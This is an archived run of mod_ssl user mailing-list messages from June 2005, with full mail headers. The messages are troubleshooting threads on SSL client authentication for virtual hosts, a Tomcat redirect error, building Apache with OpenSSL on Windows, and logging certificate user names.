X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
X-MDRemoteIP: 192.168.1.20
X-Return-Path: daniel.kimblad@gizmondostudios.se
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Daniel Kimblad" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm not a guru but I would suspect that your NameVirtualHost
directives need to differ. You probably need to configure the
virtual hosts using their domain names, like this:
------------------------------------------------------------

NameVirtualHost abc1-no-client-auth.com:443

    ...


NameVirtualHost abc1-ssl-client-auth.com:443

    ...


------------------------------------------------------------
Otherwise I think one will just overwrite the other.
Also for MSIE compatibility it is recommended that you add
the following to the virtual host configuration:
------------------------------------------------------------

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

------------------------------------------------------------
Hope this was helpful.

/Daniel

----- Original Message ----- 
From: "Hoda Nadeem" 
To: 
Sent: Thursday, June 02, 2005 3:26 PM
Subject: RE: SSL Client Auth with Virtual Hosts


Are there any parameters that I am missing, or am I doing something
incorrect?

On my setup, client authentication is either on or off globally. I can't
seem to isolate it at the virtual host level.

Thanks. 

Nadeem

Example again:

NameVirtualHost 111.111.111.111:443


    ServerAdmin adsfasfsa@asdfasfds.com
    DocumentRoot /var/www
    ServerName abc1-no-client-auth.com

    SSLEngine on
    SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
    SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key



    ServerAdmin adsfasfsa@asdfasfds.com
    DocumentRoot /var/www
    ServerName abc1-ssl-client-auth.com

    SSLEngine on
    SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
    SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key
    SSLVerifyClient require
    SSLVerifyDepth 2
    SSLCACertificateFile /etc/httpd/conf/ssl.crt/server-calist.crt
    SSLOptions +StdEnvVars +ExportCertData


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  2 16:24:38 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E8C3E14D9C6; Thu,  2 Jun 2005 16:24:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from warthog.se (mail.warthog.se [212.247.84.253])
	by master.modssl.org (Postfix) with ESMTP id A1FB814D9B4
	for ; Thu,  2 Jun 2005 16:24:36 +0200 (CEST)
Received: from p416002 [192.168.1.20]
	by warthog.se [127.0.0.1]
	with SMTP (MDaemon.PRO.v4.0.5.R)
	for ; Thu, 02 Jun 2005 16:24:11 +0200
Message-ID: <000d01c5677e$c2fbf6c0$1401a8c0@p416002>
From: "Daniel Kimblad" 
To: 
References: <429F0B61.7050605@gpi.com>
Subject: Re: Redirection limit for this URL exceeded.
Date: Thu, 2 Jun 2005 16:24:18 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_000A_01C5678F.865C3020"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1437
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
X-MDRemoteIP: 192.168.1.20
X-Return-Path: daniel.kimblad@gizmondostudios.se
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Daniel Kimblad" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_000A_01C5678F.865C3020
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Do you have different VirtualHosts configured for the domain-name
and the IP-address? If so, do they differ in configuration?

/Daniel
  ----- Original Message -----=20
  From: Rob Waldrum=20
  To: modssl-users@modssl.org=20
  Sent: Thursday, June 02, 2005 3:36 PM
  Subject: Redirection limit for this URL exceeded.


  Hi,=20

  I'm still getting this error:=20

  Redirection limit for this URL exceeded. Unable to load the requested =
page. This may be caused by cookies that are blocked.=20

  I have configured Tomcat for SSL on port 8443. I can bring tomcat up =
at https://www.mydomain.com:8443 just fine. But when I add the apps =
portion, such as: https://www.mydomain.com:8443/apps, I get the above =
error. However, when I just use the IP address, such as: =
https://12.34.56.78:8443/apps it works just fine. I have poured over =
tomcat documentatiom, reviewed my setup and configuration, checked the =
logs, everything. I'm stumped. Any ideas?=20

  Rob


------=_NextPart_000_000A_01C5678F.865C3020
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Do you have different VirtualHosts =
configured for=20
the domain-name


and the IP-address? If so, do they differ in configuration?


 


/Daniel


  
----- Original Message ----- 

  From:=20
  Rob =
Waldrum=20

  
  
Sent: Thursday, June 02, 2005 =
3:36=20
  PM

  
Subject: Redirection limit for =
this URL=20
  exceeded.

  

Hi, 

I'm still getting this error:=20
  

Redirection limit for this URL exceeded. Unable to load the =

  requested page. This may be caused by cookies that are blocked. =


I=20
  have configured Tomcat for SSL on port 8443. I can bring tomcat up at =
https://www.mydomain.com:8443 =
just=20
  fine. But when I add the apps portion, such as: https://www.mydomain.com:8443=
/apps,=20
  I get the above error. However, when I just use the IP address, such =
as: https://12.34.56.78:8443/apps =
it=20
  works just fine. I have poured over tomcat documentatiom, reviewed my =
setup=20
  and configuration, checked the logs, everything. I'm stumped. Any =
ideas?=20
  

Rob



------=_NextPart_000_000A_01C5678F.865C3020--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  2 16:34:00 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6DB1114D9CE; Thu,  2 Jun 2005 16:34:00 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailprimary.werum.de (mailprimary.werum.de [62.156.157.73])
	by master.modssl.org (Postfix) with ESMTP id 4084C14D9B4
	for ; Thu,  2 Jun 2005 16:33:59 +0200 (CEST)
Received: from werum815.werum.net (mailsmtp2.werum.net [172.20.104.15])
	by mailprimary.werum.de (Postfix) with ESMTP id 8CC4DF9443
	for ; Thu,  2 Jun 2005 16:35:24 +0200 (CEST)
Received: from localhost (unknown [192.168.1.3])
	by werum815.werum.net (Postfix) with ESMTP id 1E795932F8
	for ; Thu,  2 Jun 2005 16:33:56 +0200 (CEST)
Received: from werum815.werum.net ([192.168.1.1])
 by localhost (mailclaw.werum.net [192.168.1.3]) (amavisd-new, port 10024)
 with ESMTP id 15413-10 for ;
 Thu,  2 Jun 2005 16:32:43 +0200 (CEST)
Received: from [172.20.103.158] (werum758.werum.net [172.20.103.158])
	by werum815.werum.net (Postfix) with ESMTP
	for ; Thu,  2 Jun 2005 16:33:55 +0200 (CEST)
Message-ID: <429F18D7.7090008@werum.de>
Date: Thu, 02 Jun 2005 16:33:59 +0200
From: Eckard Wille 
User-Agent: Mozilla Thunderbird 1.6.2.0c (Windows/20050317)
X-Accept-Language: de, en-US
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL Client Auth with Virtual Hosts
References: 
In-Reply-To: 
X-Enigmail-Version: 0.89.5.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at werum.net
X-Spam-Status: No, hits=-4.897 tagged_above=-999 required=5 tests=AWL,
 BAYES_00
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hoda Nadeem schrieb:
> On my setup, client authentication is either on or off globally. I can't
> seem to isolate it at the virtual host level.

Exactly.

Take a look at http://www.modssl.org/docs/2.8/ssl_faq.html#vhosts,
use a different IP for your second host and it will work.

Greetings from Germany,
Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  3 00:33:42 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A74A714D9C8; Fri,  3 Jun 2005 00:33:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web51502.mail.yahoo.com (web51502.mail.yahoo.com [206.190.38.194])
	by master.modssl.org (Postfix) with SMTP id 1ECB814D993
	for ; Fri,  3 Jun 2005 00:33:41 +0200 (CEST)
Received: (qmail 92625 invoked by uid 60001); 2 Jun 2005 22:33:40 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=XCN1OE8Q/TX+eO1y+Ch4NyiDfHr4/CO7FR7vHafa9PQ2NTyz/5jkq7Z1c8Pp4Zglbf+8khEaaYzllsO7lHGYToKKXikrq9wvQr0R0zjg6bstoYSPdlbBjMDKD5wpwbBI1Rz2+xFyOE87gMWXC2AKyQk3ObNc015yQKTzkJ3Cek4=  ;
Message-ID: <20050602223340.92623.qmail@web51502.mail.yahoo.com>
Received: from [67.87.138.77] by web51502.mail.yahoo.com via HTTP; Thu, 02 Jun 2005 15:33:40 PDT
Date: Thu, 2 Jun 2005 15:33:40 -0700 (PDT)
From: b h 
Subject: problem compiling on windows
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: b h 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi

to begin, platform winxp pro, visual studio 6

I downloaded and extracted httpd-2.0.54-win32-src.zip,
openssl-0.9.7g.tar.gz from their respective websites. 
And I was following
http://httpd.apache.org/docs-2.0/platform/win_compiling.html

I placed awk.exe in the path, extracted all the
openssl files into srclib/openssl, ran all the perl
lines configuring, and nmaking in the srclib/openssl
directory (and they seemed to work without any
error)...

but then when running 

nmake /f Makefile.win _apacher

after a couple minutes I end up with fatal errors: 
see last few lines before the error following...

-----------------------------
   Creating library .\Release\mod_proxy.lib and object
.\Release\mod_proxy.exp
        NMAKE -nologo -f mod_proxy_connect.mak
CFG="mod_proxy_connect - Win32 Release" RECURSE=0
        tempfile.bat
        cl.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nma00480.
proxy_connect.c
        link.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nmb00480.
   Creating library .\Release\mod_proxy_connect.lib
and object .\Release\mod_proxy_connect.exp
        NMAKE -nologo -f mod_proxy_ftp.mak  
CFG="mod_proxy_ftp - Win32 Release" RECURSE=0
        tempfile.bat
        cl.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nma03996.
proxy_ftp.c
        link.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nmb03996.
   Creating library .\Release\mod_proxy_ftp.lib and
object .\Release\mod_proxy_ftp.exp
        NMAKE -nologo -f mod_proxy_http.mak 
CFG="mod_proxy_http - Win32 Release" RECURSE=0
        tempfile.bat
        cl.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nma01708.
proxy_http.c
        link.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nmb01708.
   Creating library .\Release\mod_proxy_http.lib and
object .\Release\mod_proxy_http.exp
        cd ..\..
        cd modules\ssl
        NMAKE -nologo -f mod_ssl.mak        
CFG="mod_ssl - Win32 Release" RECURSE=0 
.\Release\mod_ssl.so
NMAKE : fatal error U1073: don't know how to make
'"..\..\srclib\openssl\inc32\openssl\asn1.h"'
Stop.
NMAKE : fatal error U1077: '"C:\Program
Files\Microsoft Visual Studio\VC98\bin\NMAKE.EXE"' :
return code '0x2'
Stop.
NMAKE : fatal error U1077: '"C:\Program
Files\Microsoft Visual Studio\VC98\bin\NMAKE.EXE"' :
return code '0x2'
Stop.

C:\Documents and Settings\brad\Desktop\httpd-2.0.54>
----------------------------

everything was working perfectly and I thought I was
following all the instructions properly.  

What did I forget to do or can anyone tell me what is
wrong?  I ask here because it seems to be in the
mod_ssl portion at that time.  Please let me know if
there is a more appropriate place to ask.

(And I know it's rude to ask, but please cc me in any
responses)

thanks
b.

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  3 08:56:59 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BD8F514D9CA; Fri,  3 Jun 2005 08:56:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.slb.com (eurmta01.london.eur.slb.com [134.32.26.55])
	by master.modssl.org (Postfix) with ESMTP id 8D15714D9C7
	for ; Fri,  3 Jun 2005 08:56:58 +0200 (CEST)
Received: from pmxchannel_int-daemon.eurmta01.london.eur.slb.com by
 eurmta01.london.eur.slb.com
 (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004))
 id <0IHH00101XYYSS@eurmta01.london.eur.slb.com> for modssl-users@modssl.org;
 Fri, 03 Jun 2005 06:56:58 +0000 (GMT)
Received: from wgmail3.oslo.eur.slb.com
 (wgmail3.oslo.eur.slb.com [134.32.44.153]) by eurmta01.london.eur.slb.com
 (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004))
 with ESMTP id <0IHH0084LXYXXH@eurmta01.london.eur.slb.com> for
 modssl-users@modssl.org; Fri, 03 Jun 2005 06:56:58 +0000 (GMT)
Received: from [192.23.231.54] (localhost [127.0.0.1])
 by wgmail3.oslo.eur.slb.com (Switch-2.2.8/8.11.1) with ESMTP id j536usE03673
 for ; Fri, 03 Jun 2005 08:56:55 +0200 (MEST)
Date: Fri, 03 Jun 2005 08:56:56 +0200
From: =?ISO-8859-1?Q?=D8yvin_S=F8mme?= 
Subject: Client Authentication and Access Control
To: modssl-users@modssl.org
Message-id: <429FFF38.6070304@oslo.westerngeco.slb.com>
Organization: Schlumberger,  OFS IT
MIME-version: 1.0
Content-type: text/plain; charset=ISO-8859-1; format=flowed
Content-transfer-encoding: 7BIT
X-Accept-Language: en-us, en
User-Agent: Mozilla Thunderbird 1.0 (X11/20041206)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?=D8yvin_S=F8mme?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi.

I have read the instructions at:

http://www.modssl.org/docs/2.8/ssl_howto.html#ToC9

and successfully set up a web server which runs HTTPS and requires
client certificates for authentication.

However, I am not 100% pleased with neither of the *two* methods. What I
dislike is the *user-id* part of the information that is stored in the
access log:

Method 1 (mod_auth):

    The user-id field is a string converted from the *full* subject DN in the
    client certificate which in my case (with Verisign class 1 certificates)
    are typically 230 chars long!

Method 2 (SSLRequire):

   The user-id field is just '-'.

Can I somehow configure apache/mod_ssl to only store certain elements of
the DN (e.g. the CN in the DN) as the user-id in the access-log?


One more thing with method 1: I noted that the syntax in mod_auth/AuthGroupFile
is:

mygroup: user-id1 user-id2 user-id3

i.e. using space as a separator. The user-id produced in method 1 above
contains a lot of spaces. How can this work? Using quotes?

Thanks.

Oyvin
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  3 09:47:50 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1138B14D9CA; Fri,  3 Jun 2005 09:47:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id AD1E414D9C7
	for ; Fri,  3 Jun 2005 09:47:49 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.11/8.12.11) with ESMTP id j537lmMO030193;
	Fri, 3 Jun 2005 03:47:48 -0400
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id j537llO31137;
	Fri, 3 Jun 2005 03:47:47 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.13.1/8.12.7) with ESMTP id j537lkqe007630;
	Fri, 3 Jun 2005 08:47:46 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.13.1/8.12.10/Submit) id j537lkcK007629;
	Fri, 3 Jun 2005 08:47:46 +0100
Date: Fri, 3 Jun 2005 08:47:46 +0100
From: Joe Orton 
To: =?utf-8?B?w5h5dmluIFPDuG1tZQ==?= 
Cc: modssl-users@modssl.org
Subject: Re: Client Authentication and Access Control
Message-ID: <20050603074745.GA7569@redhat.com>
Mail-Followup-To: =?utf-8?B?w5h5dmluIFPDuG1tZQ==?= ,
	modssl-users@modssl.org
References: <429FFF38.6070304@oslo.westerngeco.slb.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <429FFF38.6070304@oslo.westerngeco.slb.com>
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Jun 03, 2005 at 08:56:56AM +0200, Øyvin Sømme wrote:
> Method 2 (SSLRequire):
> 
>   The user-id field is just '-'.
> 
> Can I somehow configure apache/mod_ssl to only store certain elements of
> the DN (e.g. the CN in the DN) as the user-id in the access-log?

mod_ssl in httpd 2.0 supports the "SSLUsername" directive which allows
this:

http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslusername

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  3 10:27:16 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 72B0B14D9CA; Fri,  3 Jun 2005 10:27:16 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail12.admin.ch (mail12.admin.ch [162.23.32.12])
	by master.modssl.org (Postfix) with ESMTP id 3471D14D9C7
	for ; Fri,  3 Jun 2005 10:27:15 +0200 (CEST)
Received: from mar01.bb.admin.ch (mar01.bb.admin.ch [193.5.222.71])
	by mail12.admin.ch (mailout) with ESMTP id C6A5C1C003B5
	for ; Fri,  3 Jun 2005 10:27:12 +0200 (CEST)
Received: from mas31.bb.admin.ch ([193.5.222.84])
	by mar01.bb.admin.ch (8.12.10/8.12.10) with ESMTP id j538RCGH012949
	for ; Fri, 3 Jun 2005 10:27:12 +0200 (METDST)
Received: from ad01008exc.ad.admin.ch ([131.102.107.145]) by antivir.admin.ch with InterScan Messaging Security Suite; Fri, 03 Jun 2005 10:27:11 +0200
Received: by ad01008exc.ad.admin.ch with Internet Mail Service (5.5.2657.72)
	id ; Fri, 3 Jun 2005 10:27:11 +0200
Message-ID: <0283C369F0B1C5409AAA6DC840AC4C5DBC3888@BKBS025.bk.intra.admin.ch>
From: Michael.Straessle@bk.admin.ch
To: modssl-users@modssl.org
Subject: Re: problem compiling on windows
Date: Fri, 3 Jun 2005 10:27:08 +0200 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael.Straessle@bk.admin.ch
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I suggest you follow the procedure in the openssl source package
(install.w32) instead of using the perl commands in the apache httpd
documentation. This worked fine for me.

HTH
michael


-----Urspr=FCngliche Nachricht-----
Von: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org] Im
Auftrag von b h
Gesendet: Freitag, 3. Juni 2005 00:34
An: modssl-users@modssl.org
Betreff: problem compiling on windows



Hi

to begin, platform winxp pro, visual studio 6

I downloaded and extracted httpd-2.0.54-win32-src.zip, =
openssl-0.9.7g.tar.gz
from their respective websites.=20
And I was following
http://httpd.apache.org/docs-2.0/platform/win_compiling.html

I placed awk.exe in the path, extracted all the
openssl files into srclib/openssl, ran all the perl
lines configuring, and nmaking in the srclib/openssl
directory (and they seemed to work without any
error)...

but then when running=20

nmake /f Makefile.win _apacher

after a couple minutes I end up with fatal errors:=20
see last few lines before the error following...

-----------------------------
   Creating library .\Release\mod_proxy.lib and object
.\Release\mod_proxy.exp
        NMAKE -nologo -f mod_proxy_connect.mak CFG=3D"mod_proxy_connect =
-
Win32 Release" RECURSE=3D0
        tempfile.bat
        cl.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nma00480.
proxy_connect.c
        link.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nmb00480.
   Creating library .\Release\mod_proxy_connect.lib
and object .\Release\mod_proxy_connect.exp
        NMAKE -nologo -f mod_proxy_ftp.mak =20
CFG=3D"mod_proxy_ftp - Win32 Release" RECURSE=3D0
        tempfile.bat
        cl.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nma03996.
proxy_ftp.c
        link.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nmb03996.
   Creating library .\Release\mod_proxy_ftp.lib and
object .\Release\mod_proxy_ftp.exp
        NMAKE -nologo -f mod_proxy_http.mak=20
CFG=3D"mod_proxy_http - Win32 Release" RECURSE=3D0
        tempfile.bat
        cl.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nma01708.
proxy_http.c
        link.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nmb01708.
   Creating library .\Release\mod_proxy_http.lib and
object .\Release\mod_proxy_http.exp
        cd ..\..
        cd modules\ssl
        NMAKE -nologo -f mod_ssl.mak       =20
CFG=3D"mod_ssl - Win32 Release" RECURSE=3D0=20
.\Release\mod_ssl.so
NMAKE : fatal error U1073: don't know how to make
'"..\..\srclib\openssl\inc32\openssl\asn1.h"'
Stop.
NMAKE : fatal error U1077: '"C:\Program
Files\Microsoft Visual Studio\VC98\bin\NMAKE.EXE"' :
return code '0x2'
Stop.
NMAKE : fatal error U1077: '"C:\Program
Files\Microsoft Visual Studio\VC98\bin\NMAKE.EXE"' :
return code '0x2'
Stop.

C:\Documents and Settings\brad\Desktop\httpd-2.0.54>
----------------------------

everything was working perfectly and I thought I was
following all the instructions properly. =20

What did I forget to do or can anyone tell me what is
wrong?  I ask here because it seems to be in the
mod_ssl portion at that time.  Please let me know if
there is a more appropriate place to ask.

(And I know it's rude to ask, but please cc me in any
responses)

thanks
b.

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around=20
http://mail.yahoo.com=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  3 19:11:27 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8055F14D9C9; Fri,  3 Jun 2005 19:11:27 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from palrel10.hp.com (palrel10.hp.com [156.153.255.245])
	by master.modssl.org (Postfix) with ESMTP id E58A314D9B1
	for ; Fri,  3 Jun 2005 19:11:26 +0200 (CEST)
Received: from cacexg12.americas.cpqcorp.net (cacexg12.americas.cpqcorp.net [16.92.1.72])
	by palrel10.hp.com (Postfix) with ESMTP id A7D251B9D
	for ; Fri,  3 Jun 2005 10:11:24 -0700 (PDT)
Received: from cacexc07.americas.cpqcorp.net ([16.92.1.57]) by cacexg12.americas.cpqcorp.net with Microsoft SMTPSVC(6.0.3790.211);
	 Fri, 3 Jun 2005 10:11:22 -0700
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: RE: problem compiling on windows
Date: Fri, 3 Jun 2005 10:11:56 -0700
Message-ID: <85ECA15B7BB46944BFD4C73AEA55482402D4696C@cacexc07.americas.cpqcorp.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: problem compiling on windows
Thread-Index: AcVoFm0XvNuXk3cXQAeaKJPLs5DDzQAR/rZA
From: "Lange, Bill Charles" 
To: 
X-OriginalArrivalTime: 03 Jun 2005 17:11:22.0445 (UTC) FILETIME=[4425FFD0:01C5685F]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lange, Bill Charles" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,
You might be running into the same thing I did a while back with the =
/win_compiling.html"=20
instructions.
You might try the following variation:

1) The instructions for running the perl scripts to build openssl are a =
little unclear,
so please note the following:
a) First you untar the openssl so that the openssl source tree is in the
   srclib/openssl directory.
b) You must cd into the the srclib/openssl directory,
   then execute the perl scripts as described.

2) On windows you can't execute the command exactly as printed in
   the win_compiling.html and as shown below:

perl util\mk1mf.pl dll no-asm no-mdc2 no-rc5 no-idea VC-WIN32 >makefile

3) Because windows does not distinguish "makefile" from "Makefile" this
   command will overwrite the "Makefile" that is previously configured
   and required for this step.

   You must direct the output to another filename, e.g.
   perl util\mk1mf.pl dll no-asm no-mdc2 no-rc5 no-idea VC-WIN32 =
>makefile.rel

   then "nmake /f makefile.rel" for the release build.

Regards,
Bill Lange

-----Original Message-----
From: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org] On Behalf Of =
Michael.Straessle@bk.admin.ch
Sent: Friday, June 03, 2005 1:27 AM
To: modssl-users@modssl.org
Subject: Re: problem compiling on windows

I suggest you follow the procedure in the openssl source package
(install.w32) instead of using the perl commands in the apache httpd =
documentation. This worked fine for me.

HTH
michael


-----Urspr=FCngliche Nachricht-----
Von: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org] Im Auftrag von b h
Gesendet: Freitag, 3. Juni 2005 00:34
An: modssl-users@modssl.org
Betreff: problem compiling on windows



Hi

to begin, platform winxp pro, visual studio 6

I downloaded and extracted httpd-2.0.54-win32-src.zip, =
openssl-0.9.7g.tar.gz from their respective websites.=20
And I was following
http://httpd.apache.org/docs-2.0/platform/win_compiling.html

I placed awk.exe in the path, extracted all the openssl files into =
srclib/openssl, ran all the perl lines configuring, and nmaking in the =
srclib/openssl directory (and they seemed to work without any error)...

but then when running=20

nmake /f Makefile.win _apacher

after a couple minutes I end up with fatal errors:=20
see last few lines before the error following...

-----------------------------
   Creating library .\Release\mod_proxy.lib and object =
.\Release\mod_proxy.exp
        NMAKE -nologo -f mod_proxy_connect.mak CFG=3D"mod_proxy_connect =
-
Win32 Release" RECURSE=3D0
        tempfile.bat
        cl.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nma00480.
proxy_connect.c
        link.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nmb00480.
   Creating library .\Release\mod_proxy_connect.lib and object =
.\Release\mod_proxy_connect.exp
        NMAKE -nologo -f mod_proxy_ftp.mak CFG=3D"mod_proxy_ftp - Win32 =
Release" RECURSE=3D0
        tempfile.bat
        cl.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nma03996.
proxy_ftp.c
        link.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nmb03996.
   Creating library .\Release\mod_proxy_ftp.lib and object =
.\Release\mod_proxy_ftp.exp
        NMAKE -nologo -f mod_proxy_http.mak CFG=3D"mod_proxy_http - =
Win32 Release" RECURSE=3D0
        tempfile.bat
        cl.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nma01708.
proxy_http.c
        link.exe
@C:\DOCUME~1\brad\LOCALS~1\Temp\nmb01708.
   Creating library .\Release\mod_proxy_http.lib and object =
.\Release\mod_proxy_http.exp
        cd ..\..
